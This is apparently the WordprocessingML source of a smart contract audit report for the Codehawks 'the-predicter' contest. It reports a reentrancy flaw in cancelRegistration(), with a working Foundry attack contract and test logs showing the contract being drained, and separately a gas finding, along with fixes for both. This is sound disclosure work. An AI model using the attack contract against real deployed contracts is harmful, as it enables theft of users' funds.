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left"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:cs="Times New Roman" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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left"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:cs="Times New Roman" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:cs="Times New Roman" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:cs="Times New Roman" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:cs="Times New Roman" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>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r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:cstheme="minorAscii" w:eastAsiaTheme="minorAscii" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Smart Contract Security Audit Report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r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:cstheme="minorAscii" w:eastAsiaTheme="minorAscii" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Project Name : the-predicter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:cstheme="minorAscii" w:eastAsiaTheme="minorAscii" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Codehawks - First Flight)</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r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:cstheme="minorAscii" w:eastAsiaTheme="minorAscii" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Date : 2025.02.18</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cstheme="minorAscii" w:eastAsiaTheme="minorAscii" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:cstheme="minorAscii" w:eastAsiaTheme="minorAscii" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Prepared By : Harisuthan</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hAnsi="Trebuchet MS"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>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hAnsi="Trebuchet MS"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://codehawks.cyfrin.io/c/2024-11-giving-thanks" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:cs="Times New Roman" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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76" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:cs="Times New Roman" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>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cccccc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>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cccccc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>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cccccc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>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cccccc"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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6"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[H - 1] TITLE (Root + Impact) :</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The `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cancelRegistration()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>` function in the `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ThePredicter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">` contract is vunerble to reentrancy attack.Which could </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> an attacker to drain the contract's Funds.</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6"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Description :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The `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cancelRegistration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>` function in the `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ThePredicter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>` contract is vulnerable to a reentrancy attack. An attacker can first register by paying the entrance fee and then repeatedly call the `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cancelRegistration`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> function to receive multiple refunds before the contract updates the user's registration status. Since the function does not update the user's state before sending funds, the attacker can drain the contract's balance through recursive calls.</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Impact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> : An attacker could drain all the funds from the `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ThePredicter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>` contract</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 xml:space="preserve">Proof of Concepts :  </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See the code below for the full reentrancy attack implementation and test results</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function testreentrencyattack() external{</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Reentrencyattack attack = new Reentrencyattack(thePredicter);</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vm.deal(address(thePredicter) , 10 ether);</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vm.deal(address(attack) , 10 ether);</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console.log("balance before attack Main contract" , address(thePredicter).balance);</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console.log("balance before attack Attacker contract" , address(attack).balance);</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vm.prank(address(attack));</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attack.attackfunction{value : 0.04 ether}();</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console.log("balance after attack Main contract" , address(thePredicter).balance);</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console.log("balance after attack Attacker contract" , address(attack).balance);</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highlight w:val="yellow"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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contract Reentrencyattack{</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ThePredicter public thePredicter;</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constructor(ThePredicter _target){</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thePredicter = _target;</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function attackfunction() external payable{</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thePredicter.register{value : msg.value}();</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thePredicter.cancelRegistration();</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rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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receive() external payable{</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if(address(thePredicter).balance &gt; 0){</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thePredicter.cancelRegistration();</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lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>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rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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Test result :</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Compiling 1 files with Solc 0.8.20</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Solc 0.8.20 finished in 1.27s</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Compiler run successful!</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Ran 1 test for test/ThePredicter.test.sol:ThePredicterTest</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[PASS] testreentrencyattack() (gas: 2497782)</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Logs:</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balance before attack Main contract 10000000000000000000</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balance before attack Attacker contract 10000000000000000000</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balance after attack Main contract 0</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balance after attack Attacker contract 20000000000000000000</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Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 13.43ms (11.63ms CPU time)</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ffffff" w:themeColor="lt1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ran 1 test suite in 15.40ms (13.43ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>you can see after the attack the attacker contract has 20 ether and the main contract has 0 ether.</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Recommended mitigation : for avoid this we can update the state before sending funds in the `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cancelRegistration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>` function.</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function cancelRegistration() public {</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if (playersStatus[msg.sender] == Status.Pending) {</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playersStatus[msg.sender] = Status.Canceled;</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(bool success, ) = msg.sender.call{value: entranceFee}("");</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require(success, "Failed to withdraw");</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return;</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 xml:space="preserve">    revert ThePredicter__NotEligibleForWithdraw();</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highlight w:val="yellow"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</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[L-1] TITLE (Root + Impact)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In the `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ThePredicter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>` contract,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variable is not declared as `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>immutable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>`, which increases gas fees.</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 xml:space="preserve">Description : </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In the `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ThePredicter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>` contract,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xml:space="preserve">` variable is stored in regular storage instead of being declared as immutable. </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This leads to higher gas costs because every access to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xml:space="preserve">` variable requires a storage read, which is more expensive than reading from bytecode. </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Since the organizer value does not change after deployment, marking it as immutable would optimize gas efficiency by storing it directly in the contract’s bytecode, reducing the cost of retrieval.</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 xml:space="preserve">Impact : </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Higher gas costs for every access to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variable, which can accumulate over time and increase the overall cost of contract interactions.</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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Proof of Concepts : </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See the code below for the full implementation of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variable and the gas cost comparison between regular storage and immutable storage.</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 xml:space="preserve">Before using the immutable keyword, the gas fees amount for access the organizer </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function testgasfeesforaccessowner() external{</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vm.txGasPrice(1);</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uint256 gasstart = gasleft();</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thePredicter.organizer();</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uint256 gasend = gasleft();</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uint256 totalspendgas = (gasstart - gasend) * 1;</w:t>
      </w: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lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>console.log("Total gas price for access : " , totalspendgas);</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highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w: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Result :</w:t>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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="ffffff" w:themeColor="lt1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>oot@LAPTOP-6DCGCU3B:~/2024-07-the-predicter# forge test --mt testgasfeesforaccessowner -vvv</w:t>
      </w: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Compiling...</w:t>
      </w:r>
    </w:p>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Compiling 2 files with Solc 0.8.20</w:t>
      </w:r>
    </w:p>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Solc 0.8.20 finished in 1.81s</w:t>
      </w:r>
    </w:p>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Compiler run successful!</w:t>
      </w:r>
    </w:p>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Ran 1 test for test/ThePredicter.test.sol:ThePredicterTest</w:t>
      </w:r>
    </w:p>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[PASS] testgasfeesforaccessowner() (gas: 15153)</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Logs:</w:t>
      </w:r>
    </w:p>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@&gt; Total gas price for access :  7829</w:t>
      </w:r>
    </w:p>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Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 5.25ms (702.17µs CPU time)</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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="ffffff" w:themeColor="lt1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ran 1 test suite in 16.41ms (5.25ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)</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rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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After using the immutable keyword, the gas fees amount for access the organizer.</w:t>
      </w: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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="ffffff" w:themeColor="lt1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>oot@LAPTOP-6DCGCU3B:~/2024-07-the-predicter# forge test --mt testgasfeesforaccessowner -vvv</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Compiling...</w:t>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Compiling 2 files with Solc 0.8.20</w:t>
      </w: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Solc 0.8.20 finished in 1.76s</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Compiler run successful!</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Ran 1 test for test/ThePredicter.test.sol:ThePredicterTest</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[PASS] testgasfeesforaccessowner() (gas: 13021)</w:t>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Logs:</w:t>
      </w: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 xml:space="preserve">  Total gas price for access :  5697</w:t>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Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 9.79ms (3.38ms CPU time)</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lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>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highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="ffffff" w:themeColor="lt1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ran 1 test suite in 25.43ms (9.79ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)</w:t>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ffffff" w:themeColor="lt1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>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you can see the gas fees for access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xml:space="preserve"> variable is reduced after using the immutable keyword.</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rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recommended mitigation : using immutable keyword for the `</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>organizer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>` variable.</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r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>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highlight w:val="yellow"/>
          <w:rtl w:val="off"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>address public immutable organizer;</w:t>
      </w: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hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w: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left"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:cs="Times New Roman" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="dk1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
